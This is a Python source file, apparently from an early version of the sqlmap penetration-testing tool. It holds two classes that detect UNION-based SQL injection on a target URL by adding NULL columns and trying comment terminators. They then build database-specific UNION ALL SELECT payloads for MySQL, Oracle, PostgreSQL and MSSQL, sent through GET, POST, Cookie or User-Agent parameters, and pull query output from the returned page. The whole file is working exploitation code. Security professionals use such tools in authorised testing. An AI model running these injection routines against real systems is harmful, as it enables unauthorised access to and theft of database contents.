#!/usr/bin/env python


import logging
import random
import re
import time

from sqlmap.common import Common
from sqlmap.parser import htmlParser
from sqlmap.settings import ERRORS_XML


class UnionCheck(Common):
    """
    This class defines methods to check if the target url is affected
    by an inband SQL injection vulnerability

    @author: Bernardo Damele
    """

    def __init__(self, args):
        self.args = args
        self.logger = logging.getLogger("sqlmapLog")


    def __effectiveUnionCheck(self, query, comment):
        """
        This method checks if the target url is affected by an inband
        SQL injection vulnerability. The test is done up to 50 columns
        on the target database table
        """

        resultDict = {}

        for count in range(50):
            if self.args.fingerprint == "Oracle" and query.endswith(" FROM DUAL"):
                query = query[:-len(" FROM DUAL")]

            if count:
                query += ", NULL"

            if self.args.fingerprint == "Oracle":
                query += " FROM DUAL"

            commentedQuery = self.appendComment(query, comment)
            payload = self.payload(newValue=commentedQuery)
            newResult = self.queryPage(payload)

            if not newResult in resultDict.keys():
                resultDict[newResult] = (1, commentedQuery)
            else:
                resultDict[newResult] = (resultDict[newResult][0] + 1, commentedQuery)

            if count:
                for element in resultDict.values():
                    if element[0] == 1:
                        if self.args.injPlace == "GET":
                            value = "%s?%s" % (self.args.url, payload)
                            self.args.unionCount = payload.count("NULL")
                        elif self.args.injPlace == "POST":
                            value  = "URL:\t'%s'" % self.args.url
                            value += "\nPOST:\t'%s'\n" % payload
                            self.args.unionCount = payload.count("NULL")
                        elif self.args.injPlace == "Cookie":
                            value  = "URL:\t'%s'" % self.args.url
                            value += "\nCookie:\t'%s'\n" % payload
                            self.args.unionCount = payload.count("NULL")
                        elif self.args.injPlace == "User-Agent":
                            value  = "URL:\t\t'%s'" % self.args.url
                            value += "\nUser-Agent:\t'%s'\n" % payload
                            self.args.unionCount = payload.count("NULL")

                        return value

        return None


    def unionCheck(self):
        """
        This method checks if the target url is affected by an inband
        SQL injection vulnerability. The test is done up to 3*50 times
        """

        logMsg  = "testing inband sql injection on parameter "
        logMsg += "'%s'" % self.args.injParameter
        self.logger.info(logMsg)

        value = ""

        self.args.brackets = self.checkForBrackets()
        if self.args.brackets:
            query = self.injectionQuery("%s UNION ALL SELECT NULL" % (")" * self.args.brackets))
        else:
            query = self.injectionQuery(" UNION ALL SELECT NULL")

        for comment in ("--", "#", "/*", ";", "%00"):
            value = self.__effectiveUnionCheck(query, comment)

            if value:
                self.args.unionComment = comment
                break

        if self.args.unionCount:
            logMsg  = "the target url could be affected by an "
            logMsg += "inband sql injection vulnerability"
            self.logger.info(logMsg)
        else:
            warnMsg  = "the target url is not affected by an "
            warnMsg += "inband sql injection vulnerability"
            self.logger.warn(warnMsg)

        return value


class UnionUse(Common):
    """
    This class defines methods to use the inband SQL injection
    vulnerability of an affected target to extract data from the
    database rather thand through blind SQL injection

    @author: Bernardo Damele
    """

    def __init__(self, args):
        self.args = args
        self.logger = logging.getLogger("sqlmapLog")


    def __processQuery(self, string):
        readyString = ""

        if self.args.fingerprint == "MySQL":
            if re.search("\ASELECT", string, re.I):
                fields = re.search("\ASELECT\s+(.*)\s+FROM\s+", string, re.I)
                if fields:
                    fields = fields.groups()[0]
                    concatFields = fields.replace(",", ", '__DEL__',")
                    string = string.replace(fields, concatFields)
                readyString = string.replace("SELECT ", "CONCAT('__START__', ", 1)
                readyString = readyString.replace(" FROM ", ", '__STOP__') FROM ", 1)
            else:
                readyString = "CONCAT('__START__', %s, '__STOP__')" % string
        elif self.args.fingerprint == "Oracle":
            if re.search("\ASELECT", string, re.I):
                fields = re.search("\ASELECT\s+(.*)\s+FROM\s+", string, re.I)
                if fields:
                    fields = fields.groups()[0]
                    concatFields = fields.replace(",", "||'__DEL__'||")
                    concatFieldsSplitted = concatFields.split("||")
                    for element in concatFieldsSplitted:
                        element = element.replace(" ", "")
                        if element == "'__DEL__'":
                            continue
                        newElement = "CAST(%s AS varchar(4000))" % element
                        concatFields = concatFields.replace(element, newElement)
                    string = string.replace(fields, concatFields)
                readyString = string.replace("SELECT ", "'__START__'||", 1)
                readyString = readyString.replace(" FROM ", "||'__STOP__' FROM ", 1)
            else:
                readyString += "'__START__'||%s||'__STOP__'" % string
        elif self.args.fingerprint == "PostgreSQL":
            if re.search("\ASELECT", string, re.I):
                fields = re.search("\ASELECT\s+(.*)\s+FROM\s+", string, re.I)
                if fields:
                    fields = fields.groups()[0]
                    concatFields = fields.replace(",", "||'__DEL__'||")
                    concatFieldsSplitted = concatFields.split("||")
                    for element in concatFieldsSplitted:
                        element = element.replace(" ", "")
                        if element == "'__DEL__'":
                            continue
                        newElement = "CAST(%s AS bpchar)" % element
                        concatFields = concatFields.replace(element, newElement)
                    string = string.replace(fields, concatFields)
                readyString = string.replace("SELECT ", "'__START__'||", 1)
                readyString = readyString.replace(" FROM ", "||'__STOP__' FROM ", 1)
            else:
                readyString += "'__START__'||%s||'__STOP__'" % string
        elif self.args.fingerprint == "Microsoft SQL Server":
            if re.search("\ASELECT", string, re.I):
                fields = re.search("\ASELECT\s+(.*)\s+FROM\s+", string, re.I)
                if fields:
                    fields = fields.groups()[0]
                    concatFields = fields.replace(",", "+'__DEL__'+")
                    concatFieldsSplitted = concatFields.split("+")
                    for element in concatFieldsSplitted:
                        element = element.replace(" ", "")
                        if element == "'__DEL__'":
                            continue
                        newElement = "CAST(%s AS varchar)" % element
                        concatFields = concatFields.replace(element, newElement)
                    string = string.replace(fields, concatFields)
                readyString = string.replace("SELECT ", "'__START__'+", 1)
                readyString = readyString.replace(" FROM ", "+'__STOP__' FROM ", 1)
            else:
                readyString = "'__START__'+%s+'__STOP__'" % string
        else:
            errMsg = "unable to process UNION query for this DBMS"
            raise Exception, errMsg

        return readyString


    def __prepareQuery(self, expression, exprPosition):
        """
        This method prepare the string to perform an inband SQL
        injection on the affected url parameter
        """

        if self.args.brackets:
            query = self.injectionQuery("%s UNION ALL SELECT " % (")" * self.args.brackets))
        else:
            query = self.injectionQuery(" UNION ALL SELECT ")

        if self.args.fingerprint == "Oracle" and query.endswith(" FROM DUAL"):
            query = query[:-len(" FROM DUAL")]

        for element in range(self.args.unionCount):
            if element > 0:
                query += ", "

            if element == exprPosition:
                if " FROM " in expression:
                    conditionIndex = expression.rindex(" FROM ")
                    query += "%s" % expression[:conditionIndex]
                else:
                    query += "%s" % expression
            else:
                query += "NULL"

        if " FROM " in expression:
            conditionIndex = expression.rindex(" FROM ")
            query += "%s" % expression[conditionIndex:]

        if self.args.fingerprint == "Oracle" and " FROM " not in query:
            query += " FROM DUAL"

        query = self.appendComment(query, self.args.unionComment)

        return query


    def __unionPosition(self, count, expression):
        logMsg  = "confirming inband sql injection on parameter "
        logMsg += "'%s'" % self.args.injParameter
        self.logger.info(logMsg)

        for exprPosition in range(self.args.unionCount):
            # Perform a request using the UNION ALL SELECT statement
            # to check it the target url is affected by an
            # inband SQL injection vulnerability
            randQuery = str("%d" % random.randint(10000, 99999))
            randQueryProcessed = self.__processQuery("\'%s\'" % randQuery)
            randQueryUnescaped = self.unescape(randQueryProcessed)

            if len(randQueryUnescaped) > len(expression):
                blankCount = len(randQueryUnescaped) - len(expression)
                expression = (" " * blankCount) + expression
            elif len(randQueryUnescaped) < len(expression):
                blankCount = len(expression) - len(randQueryUnescaped)
                randQueryUnescaped = (" " * blankCount) + randQueryUnescaped

            query = self.__prepareQuery(randQueryUnescaped, exprPosition)
            payload = self.payload(newValue=query)
            resultPage = self.queryPage(payload, content=True)

            htmlParsed = htmlParser(resultPage, ERRORS_XML)
            count += 1

            if randQuery in resultPage and not htmlParsed:
                self.args.unionPosition = exprPosition
                break

        if isinstance(self.args.unionPosition, int):
            logMsg  = "the target url is affected by an exploitable "
            logMsg += "inband sql injection vulnerability"
            self.logger.info(logMsg)
        else:
            self.args.unionPosition = False

            warnMsg  = "the target url is not affected by an exploitable "
            warnMsg += "inband sql injection vulnerability, sqlmap will "
            warnMsg += "retrieve the expression output through blind sql "
            warnMsg += "injection vector"
            self.logger.warn(warnMsg)

        return count


    def unionUse(self, expression):
        """
        This method checks for an inband SQL injection on the target
        url using the UnionCheck.unionCheck() method, then call its
        subsidiary method to effectively perform an inband SQL
        injection on the affected url
        """

        count = 0
        origExpr = expression
        start = time.time()

        if not self.args.unionCount:
            unionObject = UnionCheck(self.args)
            checkUnion = unionObject.unionCheck()

            if checkUnion:
                index = checkUnion.index("UNION")
                splittedUrl = checkUnion[index:]
                self.args.unionCount = splittedUrl.count("NULL")
            else:
                return

        if not self.args.unionCount:
            return

        # Prepare expression with delimiters
        expression = self.__processQuery(expression)
        expression = self.unescape(expression)

        # Confirm inband SQL injection and get the exact
        # column position
        if self.args.unionPosition != False and not isinstance(self.args.unionPosition, int):
            count = self.__unionPosition(count, expression)

        if not isinstance(self.args.unionPosition, int):
            return

        # Perform the expression request then parse the
        # returned page to get the expression output
        query = self.__prepareQuery(expression, self.args.unionPosition)
        payload = self.payload(newValue=query)
        resultPage = self.queryPage(payload, content=True)
        count += 1

        if "__START__" not in resultPage or "__STOP__" not in resultPage:
            return

        duration = int(time.time() - start)

        if self.args.injPlace == "GET":
            logMsg = "request: %s?%s" % (self.args.url, payload)
        elif self.args.injPlace == "POST":
            logMsg  = "request: %s " % self.args.url
            logMsg += "POST: %s\n" % payload
        elif self.args.injPlace == "Cookie":
            logMsg  = "request: %s " % self.args.url
            logMsg += "Cookie: %s\n" % payload
        elif self.args.injPlace == "User-Agent":
            logMsg  = "request: %s " % self.args.url
            logMsg += "User-Agent: %s\n" % payload
        self.logger.debug(logMsg)

        logMsg = "performed %d queries in %d seconds" % (count, duration)
        self.logger.info(logMsg)

        # Parse the returned page to get the exact inband
        # sql injection output
        startPosition = resultPage.index("__START__")
        endPosition = resultPage.rindex("__STOP__") + len("__STOP__")
        value = str(resultPage[startPosition:endPosition])

        if self.args.writeFile:
            logValue = value.replace("\n", "__NEWLINE__").replace("\t", "__TAB__")
            self.args.writeFile.write("[%s][%s][%s][%s][%s]\n" % (self.args.url, self.args.injPlace, self.args.parameters[self.args.injPlace], origExpr, logValue))
            self.args.writeFile.flush()

        return value

